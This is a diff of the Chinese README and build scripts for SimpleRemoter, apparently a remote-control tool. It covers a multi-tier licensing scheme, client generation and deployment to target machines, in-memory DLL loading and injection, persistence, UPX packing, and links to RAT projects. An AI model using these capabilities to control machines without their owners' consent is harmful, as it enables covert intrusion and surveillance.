│ │ 第一層 A │ │ 第一層 B │ │ 第一層 C │ ◄── 獨立營運 │ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ │ Layer-1 A │ │ Layer-1 B │ │ Layer-1 C │ 完全隔離 │ Windows │ │ Linux │ │ macOS
└─────┬─────┘ └─────┬─────┘ └─────┬─────┘ │ 用戶端 │ 用戶端 │ │ 用戶端
│ │ │ │ │ (DXGI) (X11) │ │ (CG)
│ ┌────────┴────────┐ │ ┌──────┴──────┐ │ └─────────┘ └─────────┘ └─────────┘
│ │ V1 授權 │ │ │ V1 授權 │ │
│ ▼ ▼ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ... ┌──────────┐ ┌──────────┐ │
│ │ 下級 A1 │ │ 下級 A2 │ │ 下級 C1 │ │ 下級 C2 │ │
│ │ Master │ │ Master │ │ Master │ │ Master │ │
│ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │
│ │ 用戶端 │ │ 用戶端 │ │ 用戶端 │ │ 用戶端 │ │
│ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │
│ └─────────┘ └─────────┘ └─────────┘ └─────────┘ │
│ │
├─────────────────────────────────────────────────────────────────────────────┤
│ 授權類型 驗證方式 特點 │
│ ───────────────────────────────────────────────────────────────────────── │
│ V2 授權 ECDSA P-256 簽名 支援離線驗證,下級連線數限制 │
│ V1 授權 HMAC + 線上驗證 連線上級伺服器驗證 │
│ 試用版 線上驗證 功能受限,需保持連線 │
└─────────────────────────────────────────────────────────────────────────────┘
``` ```
### 架構優勢 ### 多層授權(簡化視圖)
| 特性 | 說明 | ```
|------|------| 超級管理員(授權伺服器)
| **層級控制** | 超級使用者可管理任意主控程式,支援無限層級 | │ V2 授權 (ECDSA P-256)
| **完全隔離** | 不同第一層使用者的授權、資料、用戶端完全隔離 |
| **獨立營運** | 第一層使用者可獨立定價、發放授權,打造專屬品牌 | 第一層主控 ──┬── 第一層主控 ──┬── 第一層主控 ◄── 獨立營運 / 完全隔離
| **水平擴充** | 單 Master 支援 10,000+ 用戶端,多層架構可達百萬級 | │ V1 │ V1 │ V1
| **離線支援** | V2 授權支援完全離線驗證,無需依賴上游服務 | ▼ ▼ ▼
下級主控 → 用戶端 (10,000+) → 裝置群
```
### 主控程式Server | 授權 | 驗證 | 特點 |
|---|---|---|
| V2 授權 | ECDSA P-256 簽章 | 離線驗證、下級連線數限制 |
| V1 授權 | HMAC + 連線驗證 | 連接上級伺服器驗證 |
| 試用版 | 連線驗證 | 功能受限、連線限制(詳見 [合規文件](./docs/Compliance_AntiAbuse.md) |
主控程式 **YAMA.exe** 提供圖形化管理介面: 完整說明:[多層授權方案](./docs/MultiLayerLicense.md)
![主介面](./images/Yama.jpg)
- 基於 IOCP 的高效能伺服器
- 用戶端分組管理
- 即時狀態監控RTT、地理位置、活動視窗
- 一鍵產生用戶端
### 受控程式Client
![用戶端產生](./images/TestRun.jpg)
**執行形式**
| 類型 | 說明 |
|------|------|
| `ghost.exe` | 獨立可執行檔,無外部相依 |
| `TestRun.exe` + `ServerDll.dll` | 分離載入,支援記憶體載入 DLL |
| Windows 服務 | 背景執行,支援鎖定畫面控制 |
| Linux 用戶端 | 跨平台支援v1.2.5+ |
| macOS 用戶端 | 跨平台支援v1.3.2+ |
--- ---
@@ -363,62 +291,34 @@ struct FileChunkPacketV2 {
無需編譯,下載即用: 無需編譯,下載即用:
1. **下載發** - 從 [Releases](https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest) 下載最新版本 1. **下載發** - 從 [Releases](https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest) 下載最新版本
2. **啟動主控** - 執行 `YAMA.exe`,輸入授權資訊(見下方試用口令) 2. **啟動主控** - 執行 `YAMA.exe`(或 Linux 上的 `server_linux_amd64`,輸入授權資訊
3. **生用戶端** - 點擊工具列「產生」按鈕,設定伺服器 IP 和連接 3. **生用戶端** - 工具列「生成」設定伺服器 IP 和埠
4. **部署用戶端** - 將產生的用戶端複製到目標機器執行 4. **部署用戶端** - 複製到目標機器執行
5. **開始控制** - 用戶端上線後雙擊即可開啟遠端桌面 5. **開始控制** - 用戶端上線後雙擊遠端桌面
> [!TIP] > [!TIP]
> 首次測試建議在同一台機器上執行主控和用戶端,使用 `127.0.0.1` 作為伺服器位址。 > 首次測試建議在同一台機器上執行主控和用戶端,使用 `127.0.0.1` 作為伺服器位址。
### 編譯要求 ### Go 主控部署VPS
- **作業系統**Windows 10/11 或 Windows Server 2016+ 參見 [Web 遠端桌面設定](./docs/WebHTTPS.md)。最小步驟:
- **開發環境**Visual Studio 2019 / 2022 / 2026
- **SDK**Windows 10 SDK (10.0.19041.0+)
### 編譯步驟
```bash ```bash
# 1. 複製程式碼(必須使用 git clone不要下載 zip # 1. 在 VPS 上跑 Go 主控
git clone https://github.com/yuanyuanxiang/SimpleRemoter.git nohup ./server_linux_amd64 --port 6543 --http-port 9001 > yama.log 2>&1 &
# 2. 開啟方案 # 2. nginx 反代 9001 到 HTTPS
# 使用 VS2019+ 開啟 SimpleRemoter.sln # 詳見 docs/WebHTTPS.md
# 3. 選擇組態 # 3. 瀏覽器開啟 https://yourdomain.com/,登入、新增用戶端
# Release | x86 或 Release | x64
# 4. 編譯
# 建置 -> 建置方案
``` ```
**常見問題** ### 試用授權v1.2.4+
- 相依套件衝突:[#269](https://github.com/yuanyuanxiang/SimpleRemoter/issues/269)
- 非中文系統亂碼:[#157](https://github.com/yuanyuanxiang/SimpleRemoter/issues/157)
- 編譯器相容性:[#171](https://github.com/yuanyuanxiang/SimpleRemoter/issues/171)
### 部署方式 提供 2 年有效期、20 並發連線、僅限內網的試用口令:
#### 內網部署
主控與用戶端在同一區域網路,用戶端直連主控 IP:Port。
#### 外網部署FRP 穿透)
``` ```
用戶端 ──> VPS (FRP Server) ──> 本機主控 (FRP Client)
```
詳細設定請參考:[反向代理部署說明](./反向代理.md)
### 授權說明
自 v1.2.4 起提供試用口令2 年有效期20 並行連線,僅限內網):
```
授權方式:按電腦 IP 綁定
主控 IP127.0.0.1 主控 IP127.0.0.1
序號12ca-17b4-9af2-2894 序號12ca-17b4-9af2-2894
密碼20260201-20280201-0020-be94-120d-20f9-919a 密碼20260201-20280201-0020-be94-120d-20f9-919a
@@ -429,240 +329,135 @@ git clone https://github.com/yuanyuanxiang/SimpleRemoter.git
> [!NOTE] > [!NOTE]
> **多層授權方案** > **多層授權方案**
> >
> SimpleRemoter 採用企業級多層授權架構,支援代理商/開發者獨立運營: > 支援代理商 / 開發者獨立營運:第一層使用者獲得授權後可完全離線使用,下級使用者只連線到您的伺服器。完整說明:[多層授權方案](./docs/MultiLayerLicense.md)
> - **離線驗證**:第一層使用者獲得授權後可完全離線使用
> - **獨立控制**:您的下級使用者只連接到您的伺服器,資料完全由您掌控 ### 編譯
> - **自由定制**:支援二次開發,打造您的專屬版本
> - **C++ 主控 & Windows 用戶端**VS 2019/2022/2026 開啟 `SimpleRemoter.sln` → Release | x64
> 📖 **[查看完整授權方案說明](./docs/MultiLayerLicense.md)** - **Linux 用戶端**`cd linux && cmake . && make`
- **macOS 用戶端**`cd macos && ./build.sh`
- **Go 主控**`cd server/go && go build ./cmd`
--- ---
## 用戶端支援 ## 使用者文件
### Windows 用戶端 | 文件 | 適用對象 | 內容 |
|---|---|---|
**系統要求**Windows 7 SP1 及以上 | 📖 [快速部署指南](./docs/QuickStart.md) | 首次使用者 | 10 分鐘首次部署 |
| 📖 [多級網路搭建指南](./docs/NetworkSetup.md) | 需要管理下級的使用者 | 多級網路架構 |
**功能完整性**:✅功能支援 | 📖 [日常使用手冊](./docs/UserManual.md) | 所有使用者 | 全功能詳解 |
| 📖 [代理商營運手冊](./docs/AgentManual.md) | 代理商 / 經銷商 | 下級授權、FRP 設定 |
### Linux 用戶端v1.2.5+ | 📖 [客製化開發指南](./docs/CustomizationGuide.md) | 技術型客戶 | 品牌客製化、二次開發 |
| 📖 [Web 遠端桌面設定](./docs/WebHTTPS.md) | 行動端 / Go 主控使用者 | HTTPS 反代、網域設定 |
**系統要求** | 📖 [反濫用政策](./docs/Compliance_AntiAbuse.md) | 所有使用方 | 合規邊界、責任劃分 |
- 顯示伺服器X11/Xorg暫不支援 Wayland | 📖 [反濫用技術措施](./docs/Compliance_TechnicalMeasures.md) | 合規稽核方 | 屏障原始碼位置 + 設計動機 |
- 必需套件libX11
- 建議套件libXtstXTest 擴充、libXss閒置偵測
**功能支援**
| 功能 | 狀態 | 實作 |
|------|------|------|
| 遠端桌面 | ✅ | X11 螢幕擷取,滑鼠/鍵盤控制 |
| 遠端終端 | ✅ | PTY 互動式 Shell |
| 檔案管理 | ✅ | 雙向傳輸,大檔案支援 |
| 程序管理 | ✅ | 程序清單、終止程序 |
| 心跳/RTT | ✅ | RFC 6298 RTT 估算 |
| 常駐程式 | ✅ | 雙 fork 常駐化 |
| 剪貼簿 | ⏳ | 開發中 |
| 工作階段管理 | ⏳ | 開發中 |
**編譯方式**
```bash
cd linux
cmake .
make
```
### macOS 用戶端v1.3.2+
**系統要求**
- macOS 10.15 (Catalina) 及以上
- 需要授予系統權限:螢幕錄製、輔助使用、完全磁碟存取
**功能支援**
| 功能 | 狀態 | 實作 |
|------|------|------|
| 遠端桌面 | ✅ | CoreGraphics 螢幕擷取H.264 硬體編碼 |
| 滑鼠控制 | ✅ | CGEvent 模擬,支援雙擊、拖曳 |
| 鍵盤控制 | ✅ | CGEvent 模擬,完整鍵碼對應 |
| 游標同步 | ✅ | 即時同步遠端游標樣式 |
| 心跳/RTT | ✅ | RFC 6298 RTT 估算 |
| 檔案管理 | ⏳ | 開發中 |
| 遠端終端 | ⏳ | 開發中 |
**編譯方式**
```bash
cd macos
mkdir build && cd build
cmake ..
make
```
--- ---
## 更新日誌 ## 更新日誌
### v1.3.5 (2026.5.31)
**硬體編碼擴充H.264 / AV1& 多客戶授權生產化 & FRP 子級自動化**
**新功能:**
- **用戶端硬體編碼**:新增 FFmpeg 路徑的 `CFFmpegH264Encoder` / `CFFmpegAV1Encoder`,可呼叫 NVENC / Quick Sync / AMF 等 GPU 編碼器;`EncoderFactory` 執行時自動優選
- **靜畫跳編碼**:擷取層比對前後影格,完全相同時跳過編碼與傳輸——硬體編碼器在靜畫時不再被強行餵入相同影格
- **選單驅動的壓縮 / 解壓**:自訂檔案 + 資料夾選擇器(`ZstaPickerDlg`),可從遠端主機直接選混合目錄樹打包或解壓到目標路徑
- **下級主控自動啟動 frp client**:上級簽發 V2 授權時一併下發 frp 設定,子級主控啟動即接通中繼鏈路,無需人工設定 `frpc.toml`
- **合規可裁剪建置**`DISABLE_X264` / `DISABLE_FFMPEG` 編譯開關,可在不動原始碼的前提下產出完全不含 x264 / FFmpeg 的二進位,搭配 `LICENSE-THIRD-PARTY.txt`
**改進:**
- **多客戶授權伺服端硬化**`licenses.ini` hot-path 互斥鎖 + 30s 節流,寫入頻率從 0.6 → 0.07 次/秒(外推 100 在線:~160 → ~3.3 次/秒);閉環「預設續期配額消失」的 read-modify-write 競態
- **`licenses.ini` IP 清單 4KB 截斷修復**:分段寫入避免溢出尾部被永久丟棄
- **匯入 SN 按 `BindType` 嚴格校驗**:避免離線版 / 連線版 / 試用版 SN 串庫
- **用戶端 SCLoader 大瘦身**:移除一萬行硬編碼 stub`SCLoader.cpp`),改用主控執行時下發 DLL 注入
- **用戶端 logger 優雅退出**:程序結束時刷出佇列裡的日誌並記錄退出訊號
- **IOCPClient 早期封包防護**`setManagerCallBack` 之前抵達的封包不再觸發空回呼崩潰
- **多顯示器游標位置修正 & MJPEG 錄製翻轉修復**trace cursor 跨螢幕座標系修正MJPEG 上下顛倒回放修正 + 編碼失敗 0 位元組 AVI 殘留清理
- **FRP `privilegeKey` 改用 UTC 時間戳**:跨時區主控 / 中繼 / 用戶端不再因本地時區讓 frp auth 失效
- **Linux 用戶端 `install.sh` / `uninstall.sh`**:補齊一鍵部署 / 解除安裝指令稿
- **Go 伺服端建置管線**`build.ps1` / `build.cmd` 把 Go 主控納入主建置流程
- **Release / Download 連結全面遷移到 Gitea**v1.3.4+ 不再發行到 GitHub
**Bug 修復:**
- Web 檔案管理觸控雙擊不穩:觸控閾值放寬避免誤判拖曳 + 兩次 `click` 模擬實體雙擊;修復跨平台資料夾重新命名 / 點擊無回應
- 向 sub-master 發送 AUTH 時密碼產生路徑錯誤,下級始終認證失敗
- 試用 SN 誤進入 V2 / V1 授權下發分支
### v1.3.4 (2026.5.20)
**Go 主控 & 全平台主控閉環 & Linux/macOS 用戶端剪貼簿**
**新功能:**
- **Go 主控**Go 語言實作的跨平台輕量主控服務Windows / Linux / macOS聚焦於「遠端桌面 + 遠端終端 + 多使用者分級」——不取代 MFC 主控,為需要純 Linux/macOS 落地的運維情境兜底
- **Web 遠端桌面Go 主控)**H.264 → WebSocket → WebCodecs 解碼、1080P @ 20fps、桌面 + 行動端全適配遠端游標同步、Keyboard Lock 防 ESC/F11 誤退、控制態下 F11/Esc 直傳目標
- **Web 遠端終端Go 主控)**xterm.js + PTY/ConPTY 透明轉發、調整尺寸、中斷自動清理面板
- **多使用者體系Go 主控)**:管理員 / 一般使用者分級、按裝置群授權、Challenge-Response 登入、登入限流IP + 使用者名)、不透明 token
- **Linux 用戶端剪貼簿**:基於 xclip / xsel 的雙向剪貼簿同步,支援 `text/uri-list` 檔案路徑
- **macOS 用戶端剪貼簿**:基於 NSPasteboard 的雙向剪貼簿同步,檔案 URL + 舊版 API 相容
**改進:**
- Web 工作階段自適應品質被 clamp 到 H264-only 等級(≥ Good避免 Ultra/HighDIFF/RGB565讓瀏覽器無法解碼
- Linux 用戶端預設 `QualityLevel` 改為 `QUALITY_GOOD`(對齊 Windows/macOS不再請求伺服端自適應
- 登入文字欄位按用戶端能力位條件解碼 UTF-8 / GBK修正德文 / 法文等帶變音符的主機名 / 地理位置亂碼
- 裝置清單穩定排序(按上線時間),避免每次心跳 / WS 推播都洗牌
- RDP 重置按鈕接通到裝置端 `CMD_RESTORE_CONSOLE`
- MFC 主控開啟 Web 遠控工作階段時不再短暫閃一下視窗OnInitDialog 工作階段判定上移)
**Bug 修復:**
- Web 工作階段從全螢幕點關閉後裝置清單點擊失靈fullscreen 子樹規則,`showPage` 統一退全螢幕)
- 用戶端突然中斷後 Web 遠控頁面停留在 "Connected" 永不更新(新增 `device_offline` 通知)
- 多顯示器輪詢導致兩路螢幕子連線同時灌影格,畫面在兩個顯示器間跳變(`BindScreenConn` 退役舊 sub-conn
- Go 主控 `ListDevices` 因 map 迭代隨機化導致清單亂序
### v1.3.3 (2026.5.10)
**Linux/macOS 用戶端深化 & 雙層認證安全**
- 伺服端身份校驗Layer 1Linux/macOS 用戶端 HMAC-SHA256 校驗伺服端身份
- 子連線認證Layer 2TOKEN_CONN_AUTH所有子連線首封簽章 + clientID 釘死
- Linux 用戶端H.264 硬體編碼、XFixes 游標類型偵測、UTF-8 協定能力位
- macOS 用戶端:檔案管理器、遠端終端、剪貼簿同步、常駐程序模式
- 主控螢幕預覽縮圖、區域截圖、遠端桌面縮放、Web 使用者按群過濾
- 共用程式碼抽到 `common/`rtt_estimator / client_auth_state / posix_net_helpers
### v1.3.2 (2026.5.1) ### v1.3.2 (2026.5.1)
**macOS 用戶端 & Web 遠端桌面增強** **macOS 用戶端 & Web 遠端桌面增強**
**新功能:** - 全新 macOS 原生用戶端螢幕擷取、H.264 編碼、鍵鼠控制
- macOS 用戶端支援:全新實現的 macOS 原生用戶端支援螢幕擷取、H.264 編碼、鍵鼠控制、系統權限管理 - Web 遠端桌面游標同步
- Web 遠端桌面游標同步:瀏覽器端即時顯示遠端主機游標樣式 - 觸發器功能、使用者管理(角色權限)
- 觸發器功能:支援主機上線事件觸發自訂操作 - DLL 執行增強、遠端桌面輸入法切換
- 使用者管理功能:新增角色權限管理,支援多使用者分級控制
- DLL 執行增強:參數持久化儲存、支援自動執行設定
- 遠端桌面輸入法切換:支援遠端切換被控端輸入語言
**改進:**
- Web 遠端桌面手勢最佳化改進雙指手勢識別、雙擊拖曳、Shift 組合鍵支援
**Bug 修復:**
- 修復 Web 遠端桌面在 macOS 用戶端上雙擊無法開啟檔案的問題
- 修復 macOS 完全磁碟存取權限偵測不準確的問題
- 修復 RestoreMemDLL 因 DLL 資訊大小錯誤導致還原失敗
- 修復多個 DLL 同時執行可能因全域變數衝突而失敗
- 修復滑鼠雙擊和遠端桌面切換問題
- 修復 Linux 用戶端編譯缺少 libzstd.a 的問題
### v1.3.1 (2026.4.15) ### v1.3.1 (2026.4.15)
**Web 遠端桌面 & 多主控共享增強** **Web 遠端桌面MFC 主控)& 多主控共享增強**
**新功能:** - Web 遠端桌面:基於 WebSocket 實作,手機 / 平板瀏覽器存取
- Web 遠端桌面:基於 WebSocket 實現,支援手機/平板透過瀏覽器存取遠端桌面([設定指南](./docs/WebHTTPS.md) - 多顯示器停用自適應、狀態列到期日期自動更新
- 撤銷共享選單:支援撤銷已共享給其他主控的用戶端 - 多層授權自動更新、DLL 快取重用
- 工具列音訊控制:遠端桌面工具列新增系統音訊開關圖示
**改進:**
- 多顯示器停用自適應:用戶端有多個顯示器時自動停用自適應品質
- 狀態列過期日期自動更新:授權續期後狀態列立即重新整理
- 減少無效離線日誌:用戶端不在主機清單時減少離線日誌輸出
- 多層授權自動更新:第二層及以下主控的授權自動同步更新
- 使用提示增強:新增多處操作提示改善使用者體驗
- DLL 快取復用:將 DLL 儲存到登錄檔,下次啟動時直接復用
**Bug 修復:**
- 修復共享用戶端時鍵盤記錄可能無法正常運作的問題
### v1.3.0 (2026.4.8) ### v1.3.0 (2026.4.8)
**多層級 FRP 架構 & 品牌定制** **多層級 FRP 架構 & 品牌客製化**
**新功能:** - 本機 FRPS 伺服器、多層級架構自動 FRP 整合
- 本地 FRPS 伺服器支援(僅 64 位元):內建 FRP 伺服端,簡化部署 - V2 授權下級連線數限制、授權檔匯入 / 匯出
- 多層級架構自動 FRP 整合:下級主控自動取得上級 FRP 設定 - 增強型硬體 ID (V2)、UI 品牌客製化
- V2 授權下級連線數限制:支援控制下級並發連線數 - 執行時功能限制可設定
- 許可證檔案匯入/匯出支援(.lic 格式)
- 過期授權續期支援:無需重新產生許可證
- 增強型硬體 ID (V2):解決 VPS 重複 SN 問題
- MaxDepth 控制:限制分級 Master 層級深度
- 許可證管理增強:配額支援、動態對話框、刪除功能
- IP 定位 API 多提供商回退:提高定位成功率
- UI 品牌定制支援自訂程式名稱、Logo、版權等
- 執行時功能限制:試用版功能限制可設定
- 輸入歷史下拉框:快速選擇歷史輸入
- 產生用戶端新增選項:更多自訂設定
- 支援動態修改專案連結:無需重新編譯更換說明/回饋連結
**Bug 修復:** ### 更早版本
- 修復 RebuildFilteredIndices 的 Use-after-free 崩潰
- 修復 CLock::Lock 中 IOCP 競態條件崩潰 (#215)
- 修復崩潰保護服務清理和代理提升問題
- 修復訊息日誌無限增長導致的潛在崩潰
- 修復 FeatureFlags 引入後 UpperHash 字串長度問題
- 修復用戶端 SN 產生以支援 HWIDVersion 設定
**改進:** v1.2.x 系列(郵件通知、遠端音訊 Opus、V2 授權協定、V2 檔案傳輸、現代 Web 終端 xterm.js、遠端桌面工具列重寫、自適應品質控制、Linux 用戶端初版……)及 2019 年以來的全部演進,請見 [history.md](./history.md)。
- 重構 res/ 目錄結構,新增選單圖示
- 過期密碼不再被自動清除
- 保持下級主控與第一層主控的連線穩定
### v1.0.2.9 (2026.3.27)
**網路安全 & 穩定性增強**
**新功能:**
- 網路設定對話框IP 白名單/黑名單管理,即時生效
- 可設定的連線限流DLL 請求限流、IP 封禁閾值可調
- IP 歷史記錄對話框:檢視授權 IP 登入歷史
- 狀態列顯示 MTBF/執行時間和授權到期日期
- 代理崩潰保護5 分鐘內 3 次崩潰自動切換一般模式
- 用戶端搜尋功能Ctrl+F 快速搜尋 IP、位置、電腦名稱
- 自動封禁異常 IP60 秒內超過 15 次連線自動封禁 1 小時
- Proxy Protocol v2 支援FRP 代理後取得真實用戶端 IP
- Linux 剪貼簿同步和 V2 檔案傳輸支援
- 右鍵選單執行用戶端程式
- 多層授權混淆支援
**Bug 修復:**
- 修復 OnUserOfflineMsg 競態條件導致的崩潰
- 修復用戶端請求 FRPC DLL 時 FrpcParam 遺失
- 最大資料封包從 10MB 增加到 50MB
- 支援 mstsc 遠端工作階段讀取使用者登錄檔
- 修復遠端桌面最小化時剪貼簿誤觸發
- 修復操作程序對話框時主控崩潰
- 狀態列主機數量即時更新
- Linux select() 呼叫前重設 timeval
- 授權碼格式驗證,過濾垃圾資料
**改進:**
- 增強授權檢查,新增 IP 封禁提示
- 支援主控程式以使用者權限執行
- 大型 DLL 自動使用 TinyRun 回退方案
### v1.2.8 (2026.3.11)
**郵件通知 & 遠端音訊**
- 主機上線郵件通知SMTP 配置、關鍵字匹配、右鍵快捷添加)
- 遠端音訊播放WASAPI Loopback+ Opus 壓縮24:1
- 多 FRPS 伺服器同時連接支援
- 自訂游標顯示和追蹤
- V2 授權協定ECDSA 簽名)
- 修復非中文 Windows 系統亂碼問題
- Linux 用戶端螢幕壓縮演算法優化
### v1.2.7 (2026.2.28)
**V2 檔案傳輸協定**
- 支援 C2C用戶端到用戶端直接傳輸
- 斷點續傳和大檔案支援(>4GB
- SHA-256 檔案完整性校驗
- WebView2 + xterm.js 現代終端
- Linux 檔案管理支援
- 主機清單批次更新優化,減少 UI 閃爍
### v1.2.6 (2026.2.16)
**遠端桌面工具列重寫**
- 狀態視窗顯示 RTT、幀率、解析度
- 全螢幕工具列支援 4 個位置和多顯示器
- H.264 頻寬優化
- 授權管理 UI 完善
### v1.2.5 (2026.2.11)
**自適應品質控制 & Linux 用戶端**
- 基於 RTT 的智慧品質調整
- RGB565 演算法(節省 50% 頻寬)
- 捲動偵測優化(節省 50-80% 頻寬)
- Linux 用戶端初版發佈
完整更新歷史請檢視:[history.md](./history.md)
--- ---
## 相關專案 ## 相關專案
- [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) - 全英文介面遠端控制 - [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) - 全英文介面遠端控制
- [BGW RAT](https://github.com/yuanyuanxiang/BGW_RAT) - 大灰狼 9.5
- [Gh0st](https://github.com/yuanyuanxiang/Gh0st) - 經典 Gh0st 實作 - [Gh0st](https://github.com/yuanyuanxiang/Gh0st) - 經典 Gh0st 實作
--- ---
@@ -674,7 +469,6 @@ make
| **QQ** | 962914132 | | **QQ** | 962914132 |
| **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) | | **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) |
| **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) | | **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) |
| **LinkedIn** | [wishyuanqi](https://www.linkedin.com/in/wishyuanqi) |
| **Issues** | [問題回報](https://t.me/SimpleRemoter) | | **Issues** | [問題回報](https://t.me/SimpleRemoter) |
| **PR** | [貢獻程式碼](https://git.simpleremoter.com/) | | **PR** | [貢獻程式碼](https://git.simpleremoter.com/) |

5
build.cmd
View File

@@ -1,6 +1,8 @@
@echo off @echo off
:: SimpleRemoter Quick Build Script :: SimpleRemoter Quick Build Script
:: Usage: build.cmd [release|debug] [x64|x86|all] [server|clean|publish] :: Usage: build.cmd [release|debug] [x64|x86|all] [server|clean|publish|go-server]
:: go-server Build Go fallback server only -> Bin\YamaGo_x64.exe
:: go-server publish Same, plus UPX --best compression
setlocal enabledelayedexpansion setlocal enabledelayedexpansion
@@ -18,6 +20,7 @@ if /i "%~1"=="all" (set PLATFORM=all& shift& goto :parse_args)
if /i "%~1"=="server" (set EXTRA_ARGS=!EXTRA_ARGS! -ServerOnly& shift& goto :parse_args) if /i "%~1"=="server" (set EXTRA_ARGS=!EXTRA_ARGS! -ServerOnly& shift& goto :parse_args)
if /i "%~1"=="clean" (set EXTRA_ARGS=!EXTRA_ARGS! -Clean& shift& goto :parse_args) if /i "%~1"=="clean" (set EXTRA_ARGS=!EXTRA_ARGS! -Clean& shift& goto :parse_args)
if /i "%~1"=="publish" (set EXTRA_ARGS=!EXTRA_ARGS! -Publish& shift& goto :parse_args) if /i "%~1"=="publish" (set EXTRA_ARGS=!EXTRA_ARGS! -Publish& shift& goto :parse_args)
if /i "%~1"=="go-server" (set EXTRA_ARGS=!EXTRA_ARGS! -GoServer& shift& goto :parse_args)
echo Unknown argument: %~1 echo Unknown argument: %~1
shift shift
goto :parse_args goto :parse_args

115
build.ps1
View File

@@ -15,11 +15,110 @@ param(
[switch]$ServerOnly, # Only build main server (Yama), skip client projects [switch]$ServerOnly, # Only build main server (Yama), skip client projects
[switch]$Clean, # Clean before build [switch]$Clean, # Clean before build
[switch]$Publish # Publish mode: rebuild all deps + x64 Release + UPX compress [switch]$Publish, # Publish mode: rebuild all deps + x64 Release + UPX compress
[switch]$GoServer # Build Go fallback server (server/go) -> Bin/YamaGo_x64.exe
) )
$ErrorActionPreference = "Stop" $ErrorActionPreference = "Stop"
$rootDir = $PSScriptRoot
$binDir = Join-Path $rootDir "Bin"
$upxPath = Join-Path $rootDir "server\2015Remote\res\3rd\upx.exe"
# Build Go fallback server. No-op (with warning) if Go compiler is not installed.
# When -Compress is set, run UPX --best on the output (mirrors C++ publish flow).
function Build-GoServer {
param(
[string]$Configuration,
[switch]$Compress
)
Write-Host ""
Write-Host "Building Go server (server/go)..." -ForegroundColor Magenta
$goCmd = Get-Command go -ErrorAction SilentlyContinue
if (-not $goCmd) {
Write-Host "WARNING: Go compiler not found in PATH. Skipping Go server build." -ForegroundColor Yellow
Write-Host " Install from https://go.dev/dl/ and ensure 'go' is in PATH." -ForegroundColor DarkGray
return $false
}
Write-Host "Using Go: $($goCmd.Source)" -ForegroundColor Cyan
$goDir = Join-Path $rootDir "server\go"
if (-not (Test-Path $goDir)) {
Write-Host "ERROR: Go source directory not found at $goDir" -ForegroundColor Red
return $false
}
# Sync web assets (mirrors Makefile `sync` target — single source is server/web/index.html)
$webSrc = Join-Path $rootDir "server\web\index.html"
$webDstDir = Join-Path $goDir "web\assets"
if (Test-Path $webSrc) {
if (-not (Test-Path $webDstDir)) { New-Item -ItemType Directory -Path $webDstDir -Force | Out-Null }
Copy-Item -Path $webSrc -Destination (Join-Path $webDstDir "index.html") -Force
}
if (-not (Test-Path $binDir)) { New-Item -ItemType Directory -Path $binDir -Force | Out-Null }
$outFile = Join-Path $binDir "YamaGo_x64.exe"
# Release strips debug info for smaller binary; Debug keeps symbols.
$ldflags = if ($Configuration -eq "Debug") { "" } else { "-s -w" }
Push-Location $goDir
try {
$env:GOOS = "windows"
$env:GOARCH = "amd64"
if ($ldflags) {
& go build -ldflags $ldflags -o $outFile ./cmd
} else {
& go build -o $outFile ./cmd
}
$code = $LASTEXITCODE
} finally {
Pop-Location
}
if ($code -ne 0) {
Write-Host "ERROR: Go build failed (exit $code)" -ForegroundColor Red
return $false
}
$size = (Get-Item $outFile).Length / 1MB
Write-Host "OK: $outFile ($($size.ToString('F2')) MB)" -ForegroundColor Green
# In-place UPX compression. Failure is a warning, not an error — the
# uncompressed binary is still usable, and UPX occasionally refuses on
# certain PE sections.
if ($Compress) {
Write-Host ""
Write-Host "UPX compressing Go server..." -ForegroundColor Magenta
if (-not (Test-Path $upxPath)) {
Write-Host "WARNING: UPX not found at $upxPath — skipping compression" -ForegroundColor Yellow
} else {
$sizeBefore = (Get-Item $outFile).Length / 1MB
Write-Host " Before: $($sizeBefore.ToString('F2')) MB" -ForegroundColor DarkGray
& $upxPath --best $outFile
if ($LASTEXITCODE -ne 0) {
Write-Host "WARNING: UPX compression failed, uncompressed binary kept" -ForegroundColor Yellow
} else {
$sizeAfter = (Get-Item $outFile).Length / 1MB
$ratio = (1 - $sizeAfter / $sizeBefore) * 100
Write-Host " After: $($sizeAfter.ToString('F2')) MB (-$($ratio.ToString('F1'))%)" -ForegroundColor Green
}
}
}
return $true
}
# Go-only fast path: skip MSBuild entirely. -Publish here means "compress the
# Go binary too" (not the full C++ publish flow).
if ($GoServer) {
$ok = Build-GoServer -Configuration $Config -Compress:$Publish
if (-not $ok) { exit 1 }
exit 0
}
# Find MSBuild (VS2019 or VS2022, including Insiders/Preview) # Find MSBuild (VS2019 or VS2022, including Insiders/Preview)
# Order: Prefer installations with v142 toolset (VS2019) over VS2022 BuildTools # Order: Prefer installations with v142 toolset (VS2019) over VS2022 BuildTools
$msBuildPaths = @( $msBuildPaths = @(
@@ -43,6 +142,18 @@ foreach ($pattern in $msBuildPaths) {
} }
} }
# 兜底:默认路径找不到(例如 VS 装在 D 盘)时,用 vswhere 反查。
# vswhere.exe 由 VS Installer 维护,固定在 %ProgramFiles(x86)% 下,与 VS 本体盘符无关。
if (-not $msBuild) {
$vswhere = "${env:ProgramFiles(x86)}\Microsoft Visual Studio\Installer\vswhere.exe"
if (Test-Path $vswhere) {
$found = & $vswhere -latest -products * -requires Microsoft.Component.MSBuild `
-find "MSBuild\**\Bin\MSBuild.exe" 2>$null |
Select-Object -First 1
if ($found) { $msBuild = $found }
}
}
if (-not $msBuild) { if (-not $msBuild) {
Write-Host "ERROR: MSBuild not found." -ForegroundColor Red Write-Host "ERROR: MSBuild not found." -ForegroundColor Red
Write-Host "" Write-Host ""
@@ -60,9 +171,7 @@ elseif ($msBuild -match "\\18\\") { $vsYear = "2019 Insiders" }
Write-Host "Using MSBuild: $msBuild" -ForegroundColor Cyan Write-Host "Using MSBuild: $msBuild" -ForegroundColor Cyan
